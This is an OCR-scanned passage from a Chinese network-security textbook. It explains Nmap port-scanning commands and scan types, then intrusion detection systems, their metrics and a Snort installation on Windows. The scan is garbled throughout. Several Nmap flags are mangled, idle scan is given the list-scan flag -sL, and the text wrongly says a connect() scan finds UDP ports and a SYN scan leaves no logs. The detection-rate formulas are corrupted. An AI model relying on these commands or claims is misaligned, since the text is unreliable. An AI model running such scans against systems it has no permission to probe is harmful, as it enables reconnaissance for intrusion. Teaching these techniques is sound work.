(3) 检测 到 相应 的 端口 (服务 发 现 ) 的 软件 和 版 本 。 

(4) 检测 操作 系统 、 硬 件 地 址 及 软件 版 本 。 

(5) 检测 脆弱 性 的 漏洞 (Nmap 的 脚本 ) 。 

Nmap 是 一 个 非常 普遍 的 工具 , 它 有 命令 行 界面 和 图 形 用 户 界面 。Nmap 使 用 不 同 的 
技术 来 执行 扫描 ,包括 TCP 的 connect() 扫 描 、TCP 反 向 的 ident 扫描 、FTP 反弹 扫描 等 。 
所 有 这 些 扫描 的 类 型 有 自己 的 优点 和 缺点 。 

下 面 是 一 些 基本 的 命令 和 它们 的 用 法 的 例子 。 

扫描 单一 的 一 个 主机 ,命令 如 下 : 


nmap 192.168.1.2 
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扫描 整个 子 网 ,命令 如 下 ; 


nmap 192.168.1.0/24 


扫描 多 个 目标 ,命令 如 下 : 


nmap 192.168.1.2 192.168.1.5 


扫描 一 个 范围 内 的 目标 ,命令 如 下 : 


nmap 192.168.1.1-100 (扫描 IP 地 址 为 192.168.1.1-192.168.1.100 内 的 所 有 主机 ) 


扫描 除 某 一 个 IP 外 的 所 有 子 网 主机 ,命令 如 下 : 


nmap 192.168.1.1/24 - exclude 192.168.1.1 


扫描 除 某 一 个 文件 中 的 IP 外 的 子 网 主机 ,命令 如 下 : 


nmap 192.168.1.1/24 - exclude file xxx. txt (xxx. txt 中 的 文件 将 会 从 扫描 的 主机 中 排除 ) 


扫描 特定 主机 上 的 80,21,23 端口 ,命令 如 下 : 


nmap — p80,21,23 192.168.1.1 


从 上 面 已 经 了 解 了 Nmap 的 基础 知识 ,下 面 深 入 探讨 一 下 Nmap 的 扫描 技术 。 

(1) TCP SYN Scan (sS)。 这 是 一 个 基本 的 扫描 方式 , 它 被 称 为 半 开 放 扫 描 , 因 为 这 种 
技术 使 得 Nmap 不 需要 通过 完整 的 握手 ,就 能 获得 远程 主机 的 信息 。Nmap 发 送 SYN 包 到 
远程 主机 ,但 是 它 不 会 产生 任何 会 话 ,所 以 不 会 在 目标 主机 上 产生 任何 日 志 记 录 , 因 为 没有 
形成 会 话 。 这 个 就 是 SYN 扫描 的 优势 。 

如 果 Nmap 命令 中 没有 指出 扫描 类 型 ,默认 的 就 是 TCP SYN, 但 是 它 需 要 root/ 
administrator 权限 。 


nmap 一 SS 192.168.1.1 


(2) TCP connect() scan(sT) 。 如 果 不 选择 SYN 扫描 ,TCP connect() 扫 描 就 是 默认 
的 扫描 模式 。 不 同 于 TCP SYN 扫描 ,TCP connect() 扫 描 需 要 完成 三 次 握手 ,并 且 要 求 调 
用 系统 的 connect() 。Tcp connect() 扫 描 技 术 只 适用 于 找 出 TCP 和 UDP 端口 。 


nmap 一 ST 192.168.1.1 


(3) UDP scan(sU)。 顾 名 思 义 ,这 种 扫描 技术 用 来 寻找 目标 主机 打开 的 UDP 端口 , 它 
不 需要 发 送 任 何 SYN 包 , 因 为 这 种 技术 是 针对 UDP 端口 的 。UDP 扫描 发 送 UDP 数据 包 
到 目标 主机 ,并 等 待 响应 ,如 果 返 回 ICMP 不 可 达 的 错误 消息 ,说 明 端 口 是 关 闭 的 ,如 果 得 到 
正确 的 适当 的 回应 ,说 明 端 口 是 开 放 的 。 
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nmap 一 SU 192.168.1.1 


(4) Ping Scan (sP) 。Ping 扫描 不 同 于 其 他 的 扫描 方式 ,因为 它 只 用 于 找 出 主机 是 否 存 
在 于 网 络 中 , 它 不 是 用 来 发 现 是 否 开 放 端 口 的 。Ping 扫描 需要 ROOT 权限 ,如 果 用 户 没 有 
ROOT 权限 ,Ping 扫描 将 会 使 用 connect() 调 用 。 


nmap 一 SP 192.168.1.1 


(5) 版 本 检测 (sV)。 版 本 检测 用 来 扫描 目标 主机 和 端口 上 运行 的 软件 的 版 本 , 它 不 同 
于 其 他 的 扫描 技术 , 它 不 是 用 来 扫描 目标 主机 上 开放 的 端口 的 ,不 过 它 需 要 从 开放 的 端口 获取 
信息 来 判断 软件 的 版 本 。 使 用 版 本 检测 扫描 之 前 需要 先 用 TCP SYN 扫描 开放 了 哪些 端口 。 


nmap 一 SV 192.168.1.1 


(6) Idle Scan (sL)。Idle Scan 是 一 种 先进 的 扫描 技术 , 它 不 是 用 真实 的 主机 IP 发 送 
数据 包 , 而 是 使 用 另外 一 个 目标 网 络 的 主机 发 送 数据 包 。 


nmap — sL 192.168.1.6 192.168.1.1 


Idle Scan 是 一 种 理想 的 匿名 扫描 技术 ,通过 目标 网 络 中 的 192. 168. 1. 6 向 主机 192. 
168. 1. 1 发 送 数据 ,来 获取 192. 168. 1. 1 开放 的 端口 。 

还 有 其 他 的 扫描 技术 ,如 FTP bounce(FTP 反弹 ) .fragmentation scan( 碎 片 扫 描 )、IP 
protocol scan(IP 协议 扫描 ), 以 上 讨论 的 是 几 种 最 主要 的 扫描 方式 。 


本 章 小 结 


(1) 介绍 了 网 络 攻击 的 目标 主要 为 系统 和 数据 ; 攻击 手段 主要 有 主动 攻击 和 被 动 攻 
击 ; 按照 网 络 攻 击 所 使 用 的 方法 不 同 .产生 的 危害 程度 也 不 同 , 一 般 划 分 为 7 个 层次 ; 网 络 
攻击 的 分 类 和 一 般 模型 。 

(2) 介绍 了 信息 搜集 技术 的 步 又. 方法、 工具 等 。 详 细 解释 网 络 踩 点 、 网 络 扫描 \ 网 络 监听 。 

(3) 介绍 了 网 络 人 侵 的 主要 攻击 手段 ,包括 社会 工程 学 攻击 口令 攻击 漏洞 攻击 .欺骗 
攻击 ,拒绝 服务 攻击 等 。 描 述 各 种 工具 的 分 类 、 攻 击 手段 攻击 方法 。 

(4) 详细 介绍 了 网 络 后 门 与 网 络 隐 身 技术 。 介 绍 网 络 后 门 的 概念 、 如 何 设置 代理 跳板 、 
清除 日 志 等 。 


1. 简 述 基于 主机 的 扫描 器 和 基于 网 络 的 扫描 器 的 异同 。 
2. 常用 的 扫描 技术 有 哪 几 种 ? 
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. 简 述 IP 欺骗 攻击 原理 。 
. 简 述 DDoS 攻击 的 概念 。 


攻击 一 般 有 哪 几 个 步骤 ? 


. 传统 病毒 和 木马 蠕虫 各 有 哪些 特点 和 区 别 ? 

. 目标 信息 搜集 是 黑客 攻击 首先 要 做 的 工作 ,可 以 通过 哪些 方法 搜集 哪些 信息 ? 
. 为 什么 远程 计算 机 的 操作 系统 可 以 被 识别 ? 

. 结合 身边 的 网 络 环境 或 现实 的 攻击 实例 ,了 解 攻击 者 使 用 的 网 络 攻击 方法 。 
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传统 上 ,企业 网 络 一 般 采 用 防火 墙 作 为 安全 的 第 一 道 防线 ,但 随 着 攻击 工具 与 手法 的 日 
趋 复杂 多 样 ,单纯 的 防火 墙 策略 已 经 无 法 满足 对 网 络 安全 的 进一步 需要 ,网 络 的 防卫 必须 采 
用 一 种 纵深 的 、 多 样 化 的 手段 。 入 侵 检测 系统 是 继 防火 墙 之 后 保护 网 络 安全 的 第 二 道 防线 ， 
它 可 以 在 网 络 受到 攻击 时 发 出 警报 或 采取 一 定 的 干预 措施 ,以 保证 网 络 的 安全 。 


6.1 人 侵 检测 的 概念 


人 侵 是 指 任何 企图 危及 资源 的 完整 性 .机 密 性 和 可 用 性 的 活动 。 入 侵 检测 (intrusion 
detection) ,顾名思义 , 便 是 对 入 侵 行为 的 发 觉 。 它 通过 对 计算 机 网 络 或 计算 机 系统 中 的 若 
干 关键 点 搜集 信息 并 对 其 进行 分 析 , 从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 
被 攻击 的 迹象 。 

入 侵 检测 技术 是 为 保证 计算 机 系统 和 计算 机 网 络 系统 的 安全 而 设计 与 配置 的 一 种 能 够 
及 时 发 现 并 报告 系统 中 未 授权 或 异常 现象 的 技术 。 

入侵 检测 系统 (Intrusion Detection System,IDS) 是 一 种 对 网 络 传输 进行 即时 监视 ,在 
发 现 可 疑 传输 时 发 出 警报 或 采取 主动 反应 措施 的 网 络 安全 设备 ,是 进行 人 侵 检测 的 软件 与 
硬件 的 组 合 , 它 与 其 他 网 络 安全 设备 的 不 同 之 处 在 于 ,IDS 是 一 种 积极 主动 的 安全 防护 技 
术 。IDS 最 早出 现在 1980 年 4 月 ,20 世纪 80 年 代 中 期 ,IDS 逐渐 发 展 成 为 入 侵 检 测 专家 系 
统 (IDES)。20 世纪 90 年 代 ,IDS 分 化 为 基于 网 络 的 IDS 和 基于 主机 的 IDS。 后 又 出 现 分 布 
式 IDS。 目 前 ,IDS 发 展 迅 速 ,已 有 人 宣称 IDS 可 以 完全 取代 防火 墙 。 


6.1.1 入 侵 检测 系统 的 功能 及 工作 过 程 


入 侵 检 测 是 防火 墙 的 合理 补充 ,帮助 系统 对 付 网 络 攻击 ,扩展 了 系统 管理 员 的 安全 管理 
能 力 (包括 安全 审计 监视 ,进攻 识别 和 响应 ) ,提高 了 信息 安全 基础 结构 的 完整 性 。 它 从 计 
算 机 网 络 系统 中 的 若干 关键 点 搜集 信息 ,并 分 析 这 些 信息 ,看 看 网 络 中 是 否 有 违反 安全 策略 
的 行为 和 遭 到 袭击 的 迹象 。 和 人 侵 检 测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 
络 性 能 的 情况 下 能 对 网 络 进 行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 。 
入 侵 检 测 系统 与 防火 墙 在 功能 上 是 互补 的 关系 ,通过 合理 搭配 部 署 和 联动 提升 网 络 安全 级 
别 , 如 图 6-1 所 示 。 

入 侵 检测 系统 可 以 检测 来 自 外 部 和 内 部 的 入 侵 行为 和 资源 滥用 ; 防火 墙 在 关键 边界 点 
进行 访问 控制 ,实时 地 发 现 和 阻 断 非法 数据 ,它们 在 功能 上 相辅相成 ,在 网 络 安 全 中 承担 不 
同 的 角色 。 

对 一 个 成 功 的 入 侵 检测 系统 来 讲 , 它 不 但 可 使 系统 管理 员 时 刻 了 解 网 络 系统 (包括 程 
序 、 文 件 和 硬件 设备 等 ) 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制订 提供 指南 。 更 为 重要 的 一 
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保护 发 现 


司 审计 时 
图 6-1 入 侵 检测 系统 与 防火 墙 功 能 的 关系 


点 是 , 它 应 该 管理 ,配置 简单 ,从 而 使 非 专业 人 员 非 常 容 易 地 获得 网 络 安 全 。 而 且 , 入 侵 检测 
的 规模 还 应 根据 网 络 威胁 .系统 构造 和 安全 需求 的 改变 而 改变 。 入 侵 检测 系统 在 发 现 人 侵 
后 ,会 及 时 做 出 响应 ,包括 切断 网 络 连接 .记录 事件 和 报警 等 。 

入 侵 检 测 系统 的 主要 功能 有 以 下 几 点 。 

(1) 实时 检测 : 监控 和 分 析 用 户 和 系统 活动 ,实时 地 监视 ,分 析 网 络 中 所 有 的 数据 包 ; 
发 现 并 实时 处 理 所 捕获 的 数据 包 , 识 别 活动 模式 以 反映 已 知 攻击 。 

(2) 安全 审计 : 对 系统 记录 的 网 络 事件 进行 统计 分 析 ; 发 现 异常 现象 ; 得 出 系统 的 安 
全 状态 , 找 出 所 需要 的 证 据 。 

(3) 主动 响应 : 主动 切断 连接 或 与 防火 墙 联动 ,调用 其 他 程序 处 理 。 

(4) 评估 统计 : 评估 关键 系统 和 数据 文件 的 完整 性 ,统计 分 析 异 常 活动 模式 。 


6.1.2 入 侵 检测 技术 的 分 类 


入 侵 检 测 按 技术 可 分 为 特征 检测 (signature-based detection) 和 异常 检测 (anomaly 
detection) 。 按 监测 对 象 可 分 为 基于 主机 的 人 侵 检测 (HIDS) 和 基于 网 络 的 入 侵 检测 (NIDS) 。 

1. 特征 检测 

特征 检测 是 收集 非 正常 操作 的 行为 特征 ,建立 相关 的 特征 库 , 当 监测 的 用 户 或 系统 行为 
与 库 中 的 记录 相 匹 配 时 ,系统 就 认为 这 种 行为 是 入 侵 。 特 征 检测 可 以 将 已 有 的 入 侵 方 法 检 
查 出 来 ,但 对 新 的 入侵 方法 无 能 为 力 。 

特征 检测 的 难点 是 如 何 设计 模式 既 能 够 表达 “入 侵 " 现 象 又 不 会 将 正常 的 活动 包含 进 
来 ,采取 的 主要 方法 是 模式 匹配 。 

2. 异常 检测 

异常 检测 是 总 结 正常 操作 应 该 具有 的 特征 ,建立 主体 正常 活动 的 “活动 简 档 ”, 当 用 户 活 
动 状况 与 “活动 简 档 ” 相 比 , 有 重大 偏离 时 即 被 认为 该 活动 可 能 是 “入 侵 ” 行 为 。 

异常 检测 的 技术 难点 在 于 如 何 建立 “活动 简 档 ” 及 如 何 设计 统计 算法 ,从 而 不 把 正常 的 
操作 作为 “入 侵 ” 或 忽略 真正 的 “入 侵 ” 行 为 。 常 用 方法 是 概率 统计 。 

3. 基于 主机 的 入 侵 检测 

基于 主机 的 入 侵 检测 产品 (HIDS) 主 要 用 于 保护 运行 关键 应 用 的 服务 器 或 被 重点 检测 
的 主机 之 上 。 主 要 是 对 该 主机 的 网 络 实时 连接 及 系统 审计 日 志 进 行 智 能 分 析 和 判断 。 如 果 
其 中 主体 活动 十 分 可 疑 (特征 或 违反 统计 规律 ) ,入侵 检测 系统 就 会 采取 相应 措施 。 

基于 主机 的 和 人 侵 检测 的 优点 主要 表现 在 以 下 方面 。 

(1) 入 侵 行为 分 析 能 力 。HIDS 对 分 析 “ 可 能 的 攻击 行为 ”非常 有 用 ,除了 指出 入 侵 者 试 
图 执行 一 些 “ 危 险 的 命令 ”之 外 ,还 能 分 辨 出 入 侵 者 干 了 什么 事 , 例 如 ,运行 了 什么 程序 ,打开 
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了 哪些 文件 .执行 了 哪些 系统 调用 等 行为 。 其 次 ,HIDS 比 NIDS 能 够 提供 更 详尽 的 相关 信 
息 , 误 报 率 比较 低 。 

(2) 误 报 率 低 。 通 常情 况 下 ,HIDS 比 NIDS 能 够 提供 更 详尽 的 相关 信息 , 误 报 率 比较 低 。 

(3) 复杂 性 小 ,性 能 价格 比 高 。 因 为 监测 在 主机 上 运行 的 命令 序列 比 监测 网 络 流 来 得 简单 。 

(4) 网 络 通信 要 求 低 。 对 于 主机 的 检测 ,网 络 通信 和 量 低 , 可 部 署 在 那些 不 需要 广泛 的 入 
侵 检测 ,传感器 与 控制 台 之 间 的 通信 带宽 不 足 的 情况 下 。 

基于 主机 的 人 侵 检测 的 缺点 主要 表现 在 以 下 几 个 方面 。 

(1) 影响 保护 目标 。 因 为 HIDS 安装 在 需要 保护 的 设备 上 ,所 以 可 能 会 降低 应 用 系统 
的 效率 , 带 来 一 些 额 外 的 安全 问题 。 例 如 ,安装 了 HIDS 后 ,将 本 不 允许 安全 管理 员 访 问 的 
服务 器 变 成 他 可 以 访问 的 了 等 。 

(2) 服务 器 依赖 性 。 依 赖 于 主机 固有 的 日 志 与 监视 能 力 。 如 果 主 机 没有 配置 日 志 功 
能 , 则 必须 重新 配置 ,这 将 会 给 运行 中 的 业务 系统 带 来 不 可 预见 的 性 能 影响 。 

(3) 全 面部 署 代价 大 。 如 果 网 络 上 主机 比较 多 ,全 面部 署 主机 入 侵 检测 系统 代价 会 比 
较 大 。 若 选择 部 分 主机 保护 ,那些 未 装 HIDS 的 机 器 将 成 为 保护 的 盲点 ,入 侵 者 可 利用 这 些 
机 器 达到 攻击 目的 。 

(4) 不 能 监控 网 络 上 的 情况 。HIDS 主机 入 侵 检 测 系统 除了 监测 自身 的 主机 外 ,根本 不 
监测 网 络 上 的 情况 ,对 入 侵 行为 的 分 析 的 工作 量 将 随 着 主机 数目 增加 而 增加 。 

4. 基于 网 络 的 入 侵 检测 

基于 网 络 的 人 侵 检测 是 大 多 数 入 侵 检测 厂商 采用 的 产品 形式 。 通 过 捕获 和 分 析 网 络 包 
来 探测 攻击 。 基 于 网 络 的 入 侵 检 测 可 以 在 网 段 或 交换 机 上 进行 监听 ,来 检测 对 连接 在 网 段 
上 的 多 个 主机 有 影响 的 网 络 通信 ,从 而 保护 那些 主机 。 

基于 网 络 的 人 侵 检测 的 优点 表现 在 以 下 几 个 方面 。 

(1) 网 络 通信 检测 能 力 。NIDS 能 够 检测 那些 来 自 网 络 的 攻击 , 它 能 够 检测 到 超过 授权 
的 非法 访问 ,对 正常 业务 影响 少 。 

(2) 无 须 改 变 主 机 配置 和 性 能 。 由 于 它 不 会 在 业务 系统 中 的 主机 中 安装 额外 的 软件 ， 
从 而 不 会 影响 这 些 机 器 的 CPU .I/O 与 磁盘 等 资源 的 使 用 ,不 会 影响 业务 系统 的 性 能 。 

(3) 部 署 风险 小 ,独立 性 和 操作 系统 无 关 性 。 因 为 NIDS 不 像 路 由 器 、 防 火 墙 等 关键 设 
备 方式 工作 ,所 以 它 不 会 成 为 系统 中 的 关键 路 径 ,NIDS 发 生 故 障 不 会 影响 正常 业务 的 运 
行 ,部 署 NIDS 的 风险 比 HIDS 的 风险 少 得 多 。 

(4) 定制 设备 ,安装 简单 。NIDS 近年 有 向 专门 的 设备 发 展 的 趋势 ,安装 NIDS 系统 非 
常 方便 ,只 需 将 定制 的 设备 接 上 电源 ,做 很 少 的 一 些 配置 ,将 其 接 上 网 络 即 可 。 

基于 网 络 的 人 侵 检测 的 缺点 表现 在 以 下 几 个 方面 。 

(1) 不 能 检测 不 同 网 段 的 网 络 包 。NIDS 只 检查 它 直接 连接 网 段 的 通信 ,不 能 监测 在 不 
同 网 段 的 网 络 包 ,所 以 交换 以 太 网 环境 中 就 会 出 现 它 的 监测 范围 的 局 限 , 在 多 传感器 系统 会 
使 部 署 成 本 增加 。 

(2) 很 难 检测 复杂 的 需要 大 量 计算 的 攻击 。NIDS 为 了 性 能 目标 通常 采用 特征 检测 的 
方法 , 它 可 以 高 效 地 检测 出 普通 的 一 些 攻击 。 实 现 一 些 复杂 的 需要 大 量 计 算 与 分 析 时 间 的 
攻击 检测 时 ,对 硬件 处 理 能 力 要 求 较 高 。 

(3) 协同 工作 能 力 弱 。NIDS 可 能 会 将 大 量 的 数据 传 回 分 析 系 统 中 ,会 产生 大 量 的 分 析 
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数据 流量 。 采 用 以 下 方法 可 减少 回 传 的 数据 量 : 对 入 侵 判断 的 决策 由 传感器 实现 ,而 中 央 
控制 台 成 为 状态 显示 与 通信 中 心 ,不 再 作为 人 侵 行为 分 析 器 。 但 是 ,这 样 的 设计 也 会 使 系统 
中 的 传感器 协同 工作 能 力 变 得 较 弱 。 

(4) 难以 处 理 加 密 的 会 话 。NIDS 处 理 加 密 的 会 话 过 程 时 ,会 参与 解密 操作 。 目 前 通过 
加 密 通 道 的 攻击 尚 不 多 , 随 着 IPv6 的 普及 ,这 个 问题 会 越 来 越 突出 。 


6.1.3 入 侵 检 测 系 统 的 性 能 指标 


网 络 入 侵 检 测 系统 的 性 能 指标 主要 包括 三 类 , 即 准确 性 指标 、 效 率 指标 和 系统 指标 。 

1. 准确 性 指标 

准确 性 指标 在 很 大 程度 上 取决 于 测试 时 采用 的 样本 集 和 测试 环境 。 样 本 集 和 测试 环境 
不 同 ,准确 性 也 不 相同 。 主 要 包括 3 个 指标 , 即 检测 率 、 误 报 率 和 漏 报 率 。 

(1) 检测 率 。 检 测 率 是 指 被 监视 网 络 在 受到 入 侵 攻击 时 ,系统 能 够 正确 报警 的 概率 。 
通常 利用 已 知人 侵 攻击 的 实验 数据 集合 来 测试 系统 的 检测 率 。 检 测 率 王 入 侵 报警 的 数量 二 
和信 侵 攻击 的 数量 。 

(2) 误 报 率 。 误 报 率 是 指 系统 把 正常 行为 作为 入侵 攻击 而 进行 报警 的 概率 和 把 一 种 周 
知 的 攻击 错误 报告 为 男 一 种 攻击 的 概率 。 误 报 率 = 错 误 报警 数量 二 (总 体 正常 行为 样本 数 
量 十 总 体 攻 击 样 本 数量 )。 一 个 有 效 的 入侵 检测 系统 应 限制 误 报 出 现 的 次 数 ,但 同时 又 能 有 
效 截 击 。 误 报 是 入侵 检测 系统 最 难 的 问题 ,攻击 者 可 以 而 且 往 往 是 利用 包 的 结构 伪造 无 威 
胁 的 “正常 " 假 警报 .而 诱导 没有 警觉 性 的 管理 人 员 把 入 侵 检测 系统 关 掉 。 

(3) 漏 报 率 。 漏 报 率 是 指 被 检测 网 络 受 到 入 侵 攻击 时 ,系统 不 能 正确 报警 的 概率 。 通 
常 利 用 已 知人 侵 攻 击 的 实验 数据 集合 来 测试 系统 的 漏 报 率 。 漏 报 率 = 不 能 报警 的 数量 二 入 
侵 攻 击 的 数量 。 

2. 效率 指标 

效率 指标 根据 用 户 系统 的 实际 需求 ,以 保证 检测 质量 为 准 ; 同时 取决 于 不 同 的 设备 级 
别 , 如 百 兆 网 络 人 侵 检测 系统 和 千 兆 网 络 人 侵 检测 系统 的 效率 指标 一 定 有 很 大 差别 。 效 率 
指标 主要 包括 最 大 处 理 能 力 、 每 秒 并 发 TCP 会 话 数 、 最 大 并 发 TCP 会 话 数 等 。 

最 大 处 理 能 力 是 指 网 络 人 侵 检测 系统 在 检测 率 下 系统 没有 漏 警 的 最 大 处 理 能 力 。 目 的 
是 验证 系统 在 检测 率 下 能 够 正常 报警 的 最 大 流量 。 

每 秒 并 发 TCP 会 话 数 是 指 网 络 入 侵 检测 系统 每 秒 最 大 可 以 增加 的 TCP 连接 数 。 

最 大 并 发 TCP 会 话 数 是 指 网 络 人 侵 检测 系统 最 大 可 以 同时 支持 的 TCP 连接 数 。 

3. 系统 指标 

系统 指标 主要 表征 系统 本 身 运 行 的 稳定 性 和 使 用 的 方便 性 。 系 统 指标 主要 包括 最 大 规 
则 数 .平均 无 故障 间隔 等 。 

最 大 规则 数 : 系统 允许 配置 的 入 侵 检测 规则 条 目的 最 大 数目 。 

平均 无 故障 间隔 : 系统 无 故障 连续 工作 的 时 间 。 

由 于 网 络 人 侵 检测 系统 是 软件 与 硬件 的 组 合 , 因 此 性 能 指标 同样 取决 于 软 硬 件 两 方面 
的 因素 。 软 件 因素 主要 包括 数据 重组 效率 、 入 侵 分 析 算 法 行为 特征 库 等 ; 硬件 因素 主要 包 
括 CPU 处 理 能 力 、 内 存 大 小 、 网 卡 质量 等 。 因 此 ,在 考虑 性 能 指标 时 一 定 要 结合 网 络 入侵 
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检测 系统 的 软件 和 硬件 情况 。 另 外 ,由 于 网 络 安全 的 要 求 在 提高 ,黑客 攻击 技术 ,漏洞 发 现 
技术 和 入 侵 检测 技术 在 发 展 , 网 络 人 侵 检 测 系统 的 升级 管理 功能 也 是 重要 的 指标 之 一 。 用 户 
应 当 可 以 及 时 获得 升级 的 入侵 特征 库 或 升级 的 软件 版 本 ,保证 网 络 入 侵 检 测 系统 的 有 效 性 。 


6.2 网络 人 侵 检 测 系 统 产品 


6.2.1 入 侵 检 测 系统 简介 


入 侵 检测 系统 作为 最 常见 的 网 络 安 全 产品 之 一 ,已 经 得 到 了 非常 广泛 的 应 用 。 当 前 网 
络 人 侵 检测 系统 的 产品 有 很 多 ,主要 有 Snort. 金 诺 网 安安 氏 的 领 信 IDS、 启 明星 辰 的 天 闻 
系列 联想 的 联想 网 御 IDS、 东 软 、 绿 盟 科 技 的 冰 之 眼 系列 .中 科 网 威 的 天 眼 IDS .思科 的 
Cisco IDS、CA 的 eTrust IDS 等 。 


6.2.2 入 侵 检 测 系 统 Snort 


1， Snort 简介 

Snort 是 Martin Roesch 等 人 开发 的 一 种 开放 源码 的 入侵 检测 系统 。Martin Roesch 把 
Snort 定位 为 一 个 轻 量 级 的 人 侵 检测 系统 , 它 具 有 实时 数据 流量 分 析 和 IP 数据 包 日 志 分 析 
的 能 力 ,具有 跨 平台 特征 ,能 够 进行 协议 分 析 和 对 内 容 的 搜索 /匹配 。 它 能 检测 不 同 的 攻击 
行为 ,如 缓冲 区 溢出 、 端 口 扫描 、DoS 攻击 等 ,并 进行 实时 报警 。 

Snort 有 3 种 工作 模式 : 嗅 探 器 .数据 包 记 录 器 、 网 络 人 侵 检 测 系统 。 嗅 探 器 模式 仅仅 
是 从 网 络 上 读 取 数据 包 并 作为 连续 不 断 的 流 显示 在 终端 上 。 数 据 包 记录 器 模式 把 数据 包 记 
录 到 硬盘 上 。 网 路 人 侵 检测 模式 是 最 复杂 的 ,而 且 是 可 配置 的 。 可 以 让 Snort 分 析 网 络 数 
据 流 以 匹配 用 户 定义 的 一 些 规 则 ,并 根据 检测 结果 采取 一 定 的 动作 。 

2. 系统 结构 

Snort 具有 良好 的 扩展 性 和 可 移植 性 ,可 支持 Linux、Windows 等 多 种 操作 系统 平台 ， 
在 本 书 中 ,主要 介绍 Snort 在 Windows 操作 系统 中 的 安装 和 使 用 方法 。 

基于 Snort 和 BASE 的 入 侵 检测 系统 通常 采用 “传感器 一 数据 库 一 分 析 平 台 ” 的 三 层 架 
构 体 系 。 传 感 器 即 网 络 数据 包 捕获 转 储 程序 。 

WinPcap 作为 系统 底层 网 络 接口 驱动 ,Snort 作为 数据 报 捕获 .筛选 和 转 储 程序 ,二 者 
即 可 构成 IDS 的 传感器 部 件 。 为 了 完整 覆盖 监控 可 以 根据 网 络 分 布 情况 在 多 个 网 络 关键 
节点 上 分 别 部 署 IDS 传感器 。 

Snort 获得 记录 信息 后 可 以 存储 到 本 地 上 日志, 也 可 以 发 送 到 Syslog 服务 器 或 是 直接 存 
储 到 数据 库 中 ,数据 库 既 可 以 是 本 地 的 ,也 可 以 是 远程 的 ,Snort 支持 MySQL、MSSQL、 
PostgreSQL .ODBC .Oracle 等 数据 库 接口 ,扩展 性 非常 好 。 

Snort 的 日 志 记录 仅仅 包含 网 络 数据 包 的 原始 信息 ,对 这 些 大 量 的 原始 信息 进行 人 工 
整理 分 析 是 一 件 非常 耗 时 而 且 低 效率 的 事情 ,还 需要 一 个 能 够 操作 查询 数据 库 的 分 析 平 台 。 
无 论 是 从 易 用 性 还 是 平台 独立 性 考虑 , Web 平台 都 是 首选 。ACID 是 Snort 早期 最 流行 的 
分 析 平 台 , 使 用 PHP 开发 ,不 过 之 后 的 一 段 时 间 开 发 组 不 再 更 新 和 支持 这 套 系统 ,现在 已 
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经 由 基于 它 再 开发 的 BASE 所 取代 。 

这 三 种 角色 既 可 以 部 署 于 同一 个 主机 平台 也 可 以 部 署 在 不 同 的 物理 平台 上 ,架构 组 织 
非常 灵活 。 如 果 仅 仅 需 要 一 个 测试 研究 环境 , 单 服务 器 部 署 是 一 个 不 错 的 选择 ; 而 如 果 需 
要 一 个 稳定 高 效 的 专业 IDS 平台 ,那么 多 层 分 布 的 IDS 无 论 是 在 安全 还 是 在 性 能 方面 都 能 
满足 。 具 体 的 部 署 方 案 还 要 取决 于 实际 环境 需求 。 

3. 安装 环境 

一 台 安 装 Windows 2000/2003/7 操作 系统 的 计算 机 连接 到 本 地 局 域 网 中 ,需要 安装 部 
署 下 列 软件 包 , 如 表 6-1 所 示 。 


表 6-1 需要 部 署 软件 包 及 下 载 地 址 


软件 名 称 下 载 网 址 作 用 
WinPcap 4.1.2 http://winpcap. polito. it 网 络 数据 包 截 取 驱 动 程序 
Snort 2. 9. 3 for Win32 http://www. snort. org Windows 版 本 的 Snort 安装 包 


MySQL5. 5. 29 for Win32; MySQL 
GUI Tools 5.0 zl2 for Win32 

ADODB4. 95a(Active Data Objects | http://sourceforge. net/project/ | PHP5 的 数据 库 连 接 组 件 ( 支 持 
Data Base for PHP5) showfiles. php? group_id 一 42718 | MySQL/MSSQL/PostageSQL 等 ) 


www. mysql. com MySQL 数据 库 及 管理 工具 


http://apache. mirror. phpchina. 
Apache2. 2.6 台 
com/httpd/binaries/win32/ 分 析 平 台 


PHP 5. 2. 4 for Win32 Non-install; 


PEAR 1. 6. 1; http://www. php. net 分 析 平 台 
adodb Web 前 端 
acid 

4. 安装 软件 


(1) WinPcap 安装 。WinPcap 是 现成 的 安装 程序 ,过 程 非常 简单 。 下 载 安 装 程序 
WinPcap_4_1_2. exe, 双 击 , 如 图 6-2 所 示 。 全 部 采用 默认 安装 即 可 。 


会 WinPcap 4.1.2 Setup 


WinPcap 4.1.2 Installer 
nh cap Welcome to the WinPcap 4.1.2 Instalation Wizard 


This product is brought to you by 


cAEE 


TECHNOLOGIES 


Packet Capturing and Network Analysis Solutions 


6-2 ”WinPeap 安装 界面 
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(2) Snort 安装 。Snort 的 安装 过 程 也 非常 简单 。 下 载 安 装 程序 Snort 2 9_3_ 
Installer. exe, 双 击 , 如 图 6-3 所 示 。 建 议 将 Snort 安装 在 非 系统 分 区 内 ,这 里 的 安装 路 径 为 
D:\snort, 如 图 6-4 所 示 。 其 他 设置 采用 默认 安装 。 安 装 完 Snort 后 ,rules 目录 下 还 是 空 
的 ,需要 将 另外 下 载 的 snort 规则 包 解 压 复 制 到 snort 安装 目录 下 ,注意 规则 包 所 对 应 的 
版 本 。 

修改 Snort 的 设置 文件 : d:\snort\rules\var\snort. conf。 

设置 规则 包 路 径 : var d:\snort\rules。 


会 Snort 2.9.3 Setup 


License Agreement 
Please review the license terms before Instaling Snort 2.9,3, 


Press Page Down to see the rest of the agreement, 


FRR ere rt enneenseetes 
tte 


[The text that follows is the GNU General Public License, em en v2) 
andjor distribution of SNOI 


nd governs your use, modification 
ion 9 of the GPL Y2 acknowledges that the Free Software Foundation may 
ish revised andjor new versions of the GPL V2 from time to time, Section 9 
ther states that a licensee of a program subject to the GPL V2 could be 

‘ee to use any such revised andjor new versions under two different scenarios: 

1. "Falure to Specify.” Section 9 of the GPL Y2 alows a lcensee of a 


Jf you accept the terms of the agreement, chick I Agree to continue, You must accept the 
agreement to install Snort 2,9.3, 


Nullsoft Install System v2,4E 


Lagee 
图 6-3 Snort 安装 界面 


全 Snort 2.9.3 5etup 


Choose Install Location 
Choose the folder in which to install Snort 2.9,3, 


Setup wil install Snort 2.9.3in the Following folder, To install in a different Folder, chick Browse 
and select another folder, Click Next to continue, 


Destination Folder 


[dvsnort 


Space required: 9.0MB 
Space available: 27,2GB 


Nulsoft Instal System Y2,46 — 


